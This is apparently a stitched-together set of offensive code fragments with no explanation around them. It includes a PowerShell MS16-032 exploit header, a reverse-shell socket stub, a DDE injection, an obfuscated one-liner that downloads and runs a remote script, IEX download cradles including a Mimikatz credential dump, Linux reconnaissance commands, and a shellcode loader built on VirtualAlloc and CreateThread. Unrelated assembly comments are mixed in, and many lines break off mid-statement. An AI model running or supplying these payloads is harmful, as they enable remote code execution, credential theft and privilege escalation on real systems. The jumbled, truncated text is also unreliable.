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function Invoke-MS16-032 {
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
$socket = new-object System.Net.Sockets.TcpClient('', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
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{DDE {REF C} "a"}
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) )
Powershell IEX (New-Object Net.WebClient).DownloadString('')
Powershell IEX (New-Object Net.WebClient).DownloadString(''); $m = Invoke-Mimikatz -DumpCreds; $m
Powershell IEX (New-Object Net.WebClient).DownloadString('
; Main.asm file generated by New Project wizard
; Created: Cum Mar 11 2016
; Processor: 8086
; Compiler: MASM32
; Before starting simulation set Internal Memory Size
; in the 8086 model properties to 0x10000
cat /etc/passwd
uname -a
$knQoUoTfNfL = @"
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x